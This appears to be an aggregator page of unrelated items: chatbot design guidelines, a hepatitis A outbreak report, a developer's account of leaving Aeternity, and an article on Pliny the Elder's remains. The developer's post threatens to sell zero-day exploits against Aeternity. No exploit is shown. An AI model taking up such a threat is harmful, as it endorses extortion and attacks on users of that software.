How to design a Lenny-like bot

At the end of the paper, you’ll find a set of eight guidelines for developing Lenny-like bots, some of which may also be useful in other contexts!

  1. Maximise coherence between all the features of the chatbot available at first hearing (e.g., voice, accent, gender, class of age membership etc., must all be congruent).
  2. The first available recognised identity of the bot should be tied to repeat queries – develop a set of repeat queries e.g., based on hearing issues, connection problems, incidents during the call and so on.
  3. Design a list of queries checking the identity of the caller, organisation etc.
  4. Design 3 or 4 multi-turn units. The first unit that begins the turn should signal that it will not be connected to the previous ones with a ‘misplacement marker’ (e.g. ‘By the way…’).
  5. Design an attention checking turn (‘hello? Are you still there?) to be activated after a few seconds of silence
  6. Carefully design the sequential order of the first turns, to get you through the introductory period
  7. Preserve an equilibrium between initiating and responding turns.
  8. Have at least 20 turns, to prevent the risk of looping too early.

Machine Learning: An Applied Econometric Approach [pdf]


The Economics of Garbage Collection (2011) [pdf]

San Diego Declares Health Emergency Amid Hepatitis A Outbreak

$
0
0

A nurse loads a syringe with a vaccine against hepatitis at a free immunization clinic for students before the start of the school year, in Lynwood, California in 2013. Robyn Beck/AFP/Getty Imageshide caption

toggle caption
Robyn Beck/AFP/Getty Images

San Diego's homeless population has been hit hardest by the highly contagious hepatitis A virus.

The outbreak, which began in November, has spread after vaccination and educational programs in the city failed to reduce the infection rate. The virus attacks the liver.

The public health declaration bolsters the county Health and Human Services Agency's ability to request state assistance to fund new sanitation measures. Areas with high concentrations of homeless people will receive dozens of portable hand-washing stations. Health workers will also use bleached-spiked water for power-washing contaminated surfaces.

Dr. Wilma Wooten, the San Diego Public Health Officer who signed the declaration into law on Friday, says the sanitation precautions are modeled after similar programs in other Southern California cities - including Los Angeles.

"We know that L.A. has had no local cases of hepatitis A related to the strain that we're seeing here in San Diego," she said. "It makes sense that, if they're doing it there and they haven't had any cases, it could be beneficial here as well."

The first cases linked to the outbreak were first reported in November. As of Friday, more than 15 people in the area have died from hepatitis infections and more than 350 others have been sickened.

According to the World Health Organization most hepatitis A outbreaks are primarily spread when an uninfected person ingests food or water that is contaminated with the feces of an infected person. The disease is closely associated with unsafe water or food, inadequate sanitation and poor personal hygiene.

Hepatitis A infections are common among the homeless population due to the lack of access to sanitary facilities. San Diego's efforts to combat the illness began earlier this summer. Health workers promoted hand washing practices and stepped-up street cleanings - but an article published by Voice of San Diego highlighted bureaucratic obstacles that have delayed sanitation improvements in the city.

Concerns have also been raised over the city's ability to handle the outbreak. Employees of the Service Employees International Union say the county doesn't employee enough public health professionals to meet the demand of the growing epidemic.

The California State Legislature is reviewing whether the amount of health resources in the county are adequate. Its findings are expected within the next several months.

Why I left

$
0
0

1 August 2017

discuss this on reddit

  • What is going on? I left Aeternity. Many of you have been wondering why I have been so quiet lately. Usually Zack loves talking about himself. For my own safety I waited until I was far away from the rest of the Aeternity team.

  • How did this happen? I am young. I didn't think it mattered who owned the company "Aeternity". I didn't find out who owns Aeternity until the token sale was over, and all the $77 million were controlled by the owner of Aeternity.

Things I have done for Aeternity:

  • I invented and implemented Turing complete state channels.
  • I invented and implemented off-chain markets, which is Aeternity's killer app.
  • I invented and implemented an oracle mechanism which is orders of magnitude more efficient than the competition.
  • I invented and implemented the Aeternity governance mechanism, for updating variables like block-size and block-reward.
  • I answered technical questions.
  • I came up with the ideas in the Aeternity white paper.
  • I gave training in Aeternity technology.
  • I implemented a merkel trie database for Aeternity.
  • I implemented a virtual machine with compilers for Aeternity.
  • I wrote the Aeternity testnet.
  • I wrote the lightning network on top of the testnet.
  • I wrote an off-chain marketplace in the lightning network.
  • I helped Aeternity to raise over $77 million from an ICO.
  • I gave talks, I flew places to interview people.
  • I memorized lines and was an actor in the Aeternity movie.
  • I did livestreams of software development.
  • I maintained the testnet and github for over 9 months.
  • I let Aeternity use my name.

  • What I should reasonably get:

The team that raised the money had about 6 members. Out of these 6 people, I was the only one working on the technology. Since this is a technology startup, I should be controlling at least half of this money. I should be deciding how Aeternity uses it's money in regard to developing the technology. I should be deciding what programmers to hire, and what tasks should be worked on. Instead the anonymous owner of Aeternity is deciding how the money is spent.

  • How much I was willing to work for:

For about $3.5 million I was willing to work exclusively on Aeternity.

For about $1.7 million I was willing to make Aeternity secure and work on Aeternity non-exclusively.

For about $300 000 I was willing to leave Aeternity, as long as Aeternity didn't use the technology I invented.

  • To the Aeternity investors:

I am very sorry that this has happened to you. Many of you were tricked because I was tricked first. I shouldn't have let myself fall for this. I apologize.

January 2015- I began programming the blockchain that would eventually be called Aeternity. At the time it was called "Flying Fox". I invented turing-complete state channels for this blockchain, and I did the research necessary to be able to build the Aeternity oracle and governance.

March 2017- Aeternity tells me I am the founder and will be highest paid out of Aeternity, and that I will control at least 10% of the budget.

May- I keep bringing up how much I want to get paid, and asking to see how the budget is planned to make sure I can get paid. The owner of Aeternity says that we will discuss it more "tomorrow", or "after my trip", or "after I sleep", or "later". The owner of Aeternity says that if I mention anything to the community about how unstable my relationship is with Aeternity, that Aeternity will not pay me anything, and Aeternity will sue me for damages.

June- Money was collected from the contribution campaign. Other programmers were getting paid regularly, but I have still not been paid. So I went on strike. I stopped answering technical questions, and I stopped helping with Aeternity software. I demanded that Aeternity and I come to agreement about how I will get paid.

August- The owner of Aeternity tells me that I am not a founder. The owner tells me that I am a junior erlang programmer, and that he already has other more experienced erlang programmers who want to work for him. The owner tells me that Aeternity is not interested in using any of the technology I invented, or any of the software I have written. So, he asks me how much I think would be a fair payment under these circumstances. I am comfortable being paid $300 000. If Aeternity doesn't want to use my technology, then this means I have failed, so I am willing to be paid a small amount.

Aeternity developers are still working on the technology that I invented. Aeternity is still describing itself to the public as using the technology that I invented. I think that the owner of Aeternity is lying to me. Aeternity wants to use the technology I invented without paying me.

August 17- Aeternity finally makes an offer to hire me that I am comfortable with. In the process of negotiating my employment, the owner of Aeternity was asking me technical questions, and the honest answers I gave made him angry. He wished that universe worked differently, and he blamed me, the messenger of bad news. The owner of Aeternity was so upset by the technical limitation, that he did something to me that both scared and injured me. I no longer feel safe working with this person. I am walking with a limp a week later.

The owner of Aeternity is someone who punishes people that tell him uncomfortable truths. So, it is impossible for the owner to understand the technology, or to hire people who understand it.

Immediately after the awful experience, Aeternity's owner and three other employees get together to pressure me into signing a contract where I would agree to not talk about what happened to me. They tell me I wont get paid unless I sign. The contract says "Zack agrees that all of his work is worth $300 000, and that Aeternity owes him nothing more". and "Zack agrees to never say anything about Aeternity, or else Aeternity can sue him for damages." I have not signed.

It is very hard for me to program while in a state of fear. I cannot work with people who make me feel this way. I stopped communicating with the community because I was afraid for my physical security.

August-

The Aeternity lawyer spent 5 days with me, begging me to sign the contract. I wonder how much lawyers get paid per hour. He kept saying stuff like "This contract is only for you Zack, it doesn't benefit us at all."

Aeternity hires a "new CTO", as if I was stepping down from some kind of power. In private I was an unpaid "junior erlang dev" with no control over how funds are used, essentially an intern, but in public I was the "technical lead". It is not fair that Aeternity uses my name this way when they don't give me any power. This is a trick so that they can blame me for their mistakes.

September-

I have left Europe. I am in a safe place. I finally feel safe enough to communicate with the community again.

If Aeternity is going to use the technology invented, and they wont pay me to make their software secure, then my only way to get paid is by selling zero-day exploits for people who want to attack Aeternity.

As far as I know, Marion also has not been paid. Aeternity might steal from her too, which could be a disaster.

The Aeternity leadership doesn't understand the technology. So it is impossible for them to hire programmers who do understand. They will be able to sell most of their AE tokens before the blockchain gets launched. So they have little incentive to deliver a working product.

I want to work on blockchains for at least the next decade. Keep an eye on my github.https://github.com/zack-bitcoin

Lessons I Wish I Had Learned Before Teaching Differential Equations (1997) [pdf]

Pompeii Hero Pliny the Elder May Have Been Found 2,000 Years Later

$
0
0

Italian scientists are a few thousand euros and a test tube away from conclusively identifying the body of Pliny the Elder, the Roman polymath, writer and military leader who launched a naval rescue operation to save the people of Pompeii from the deadly eruption of Mt. Vesuvius 2,000 years ago.

If successful, the effort would mark the first positive identification of the remains of a high-ranking figure from ancient Rome, highlighting the work of a man who lost his life while leading history's first large-scale rescue operation, and who also wrote one of the world's earliest encyclopedias.

Given that Italian cultural and scientific institutions are mired in budget troubles, the Pliny project is seeking crowdfunding for the scientists, who also studied Oetzi the Iceman– the 5,300-year-old mummy found perfectly preserved in an alpine glacier.

Get the best of Haaretz: Follow us on Facebook

Sailing into the dark

The remains now believed to be Pliny's were found more than a century ago. But identifying the body has only recently become feasible, says Andrea Cionci, an art historian and journalist who last week reported the findings in the Italian daily La Stampa.

Gaius Plinius Secundus, better known as Pliny the Elder, was the admiral of the Roman imperial fleet moored at Misenum, north of Naples, on the day in 79 C.E. when Vesuvius erupted.

According to his nephew, Pliny the Younger, an author and lawyer in his own right who was also at Misenum and witnessed the eruption, Pliny the Elder's scientific curiosity was piqued by the dark, menacing clouds billowing from the volcano. Initially he intended to take a small, fast ship to observe the phenomenon. But when he received a desperate message (possibly by signal or pigeon) from a family he knew in Stabiae, a town near Pompeii, he set out with his best ships to bring aid not only to his friends "but to the many people who lived on that beautiful coast."

Flavio Russo

A deadly cloud

He would have had about a dozen quadriremes, warships with four banks of rowers, at his disposal, says Flavio Russo, who in 2014 wrote a book for the Italian Defense Ministry about Pliny's rescue mission and the tentative identification of his remains.

These ships were some of the most powerful units in the Roman naval arsenal, capable of carrying some 200 soldiers (or survivors) on deck while braving the stormy seas and strong winds stirred up by the eruption, Russo told Haaretz in an interview. "Before him, no one had imagined that machines built for war could be used to save people," he said.

The Roman fleet made the 30-kilometer journey across the Gulf of Naples at full speed, launching lifeboats to collect the hundreds of refugees who had made their way to the beaches.

According to Pliny the Younger, his uncle also disembarked and went looking for his friends in Stabiae. But as he was leading a group of survivors to safety, he was overtaken by a cloud of poisonous gas, and died on the beach.

We do not know how many people reached the safety of the ships before the cloud moved in. Russo estimates the fleet may have saved up to 2,000 people – a number roughly equal to the estimated number of those killed in the eruption, as the volcanic spew wiped out the towns of Pompeii, Herculaneum and Stabiae.

Pliny the Younger's description of the eruption is considered so accurate that experts today call similarly explosive volcanic events as "Plinian eruptions."

Indirect evidence confirming his story was found in the 1980s, when archaeologists digging at the ancient port of Herculaneum uncovered the remains of a legionnaire and a burnt boat, possibly one of the lifeboats and a crew member dispatched by Pliny's fleet. They also found the skeletons of some 300 people who had sought refuge in the covered boat sheds of the port, only to die instantly when the so-called pyroclastic surge, a superheated cloud of volcanic gas and rock typical of these kinds of eruptions, rolled down Vesuvius, killing everyone in its path.

MapMaster

Wouldn't prance like a ballerina

In the first years of the 20th century, amid a flurry of digs to uncover Pompeii and other sites preserved by the layers of volcanic ash that covered them, an engineer called Gennaro Matrone uncovered some 70 skeletons near the coast at Stabiae. One of the bodies carried a golden triple necklace chain, golden bracelets and a short sword decorated with ivory and seashells.

Matrone was quick to theorize that he had found Pliny's remains. Indeed, the he place and the circumstances were right, but archaeologists at the time laughed off the theory, believing that a Roman commander would not run around "covered in jewelry like a cabaret ballerina," Russo said.

Humiliated, Matrone sold off the jewels to unknown buyers (laws on conservation of archaeological treasures were more lax then) and reburied most of the bones, keeping only the supposed skull of Pliny and his sword, Russo said.

These artifacts were later donated to a small museum in Rome – the Museo di Storia dell'Arte Sanitaria (the Museum of the History of the Art of Medicine) – where they have been kept, mostly forgotten, until today.

Russo, who has been the main driving force behind efforts to confirm the identification, says that judging by Matrone's drawings, the jewelry found on the mysterious skeleton as well as the ornate sword are compatible with decorations common among high-ranking Roman navy officers and members of the equestrian class, the second-tier nobility to which Pliny belonged.

Furthermore, an anthropologist has concluded that the skull held in the museum belonged to a male in his fifties, Russo said. We know from Pliny the Younger that his uncle was 56 when he died.

With evidence mounting, Russo and Cionci turned to the Oetzi the Iceman team to have them perform more tests on the skeleton from Stabiae.

"We are not saying that this is Pliny, merely that there are many clues that suggest it, and we should test this theory scientifically," Cionci said. "This is something unique: it's not like we have the bones of Julius Caesar or Nero."

Tell-tale teeth

Researchers plan to carry out two tests: a comparison between the skull's morphology with known busts and images of Pliny, and, more importantly, an examination of the isotope signatures in his teeth.

"When we drink water or eat something, whether it's plants or animals, the minerals from the soil enter our body, and the soil has a different composition in every place," explains Isolina Marota, a molecular anthropologist from the University of Camerino, in central Italy.

By matching the isotopes in the tooth enamel, which is formed in childhood, with those in soil samples, scientists can determine where a person grew up. In the case of the Iceman, they managed to pinpoint the Alpine valley where he had spent his childhood. For Pliny, they would look for signatures from the northern Italian town of Como, where he was born and bred, Marota told Haaretz.

She estimated the tests would cost around 10,000 euros. Once the money is found, obtaining the necessary permits and performing the research will take some months, she said.

For its part, the museum hosting the skull would be happy to sacrifice a bit of a tooth to highlight the importance of their exhibit, said Pier Paolo Visentin, secretary general of the Accademia di Storia dell'Arte Sanitaria, which runs the museum.

Visentin noted that while we have names on Roman sarcophagi and burials in catacombs, there are no cases of major figures from ancient Rome whose remains have been positively identified – leaving aside traditions and legends linked to the relics of Christian saints and martyrs.

For one thing, Romans have favored cremation throughout much of  their history. And when they did bury their dead, they did not embalm them like the Egyptians, who have left us a multitude of neatly labeled mummies of pharaohs and officials.

Finally, the Italian climate isn't dry like the Egyptian desert and the looting of ancient monuments that was common during the Middle Ages would have done the rest, he says.

"This is quite a unique case, since these remains were preserved in the time capsule that is Pompeii," Visentin said.

You quote Pliny all the time

Besides his last, humanitarian gesture, Pliny is known for the books he wrote, ranging from military tactics, to history and rhetoric. His greatest and only surviving work was his Naturalis Historia (Of Natural History): 37 books filled with a summation of ancient knowledge on astronomy, mathematics, medicine, painting, sculpture and many other fields of the sciences and arts.

Pliny's work inspired later encyclopedias: most of us at some point have unknowingly cited him. Perhaps, looking at these experiments on his possible remains, he would be skeptical of any conclusions, telling us to take them "with a grain of salt" and reminding us that "the only certainty is that nothing is certain."

Or perhaps he would encourage scientists to forge on, repeating what, according to his nephew, he said when his helmsman suggested they return to port as scalding ash and fiery stones began raining on the fleet headed for Vesuvius. His response was: "Fortune favors the bold."

Viewing all 25817 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>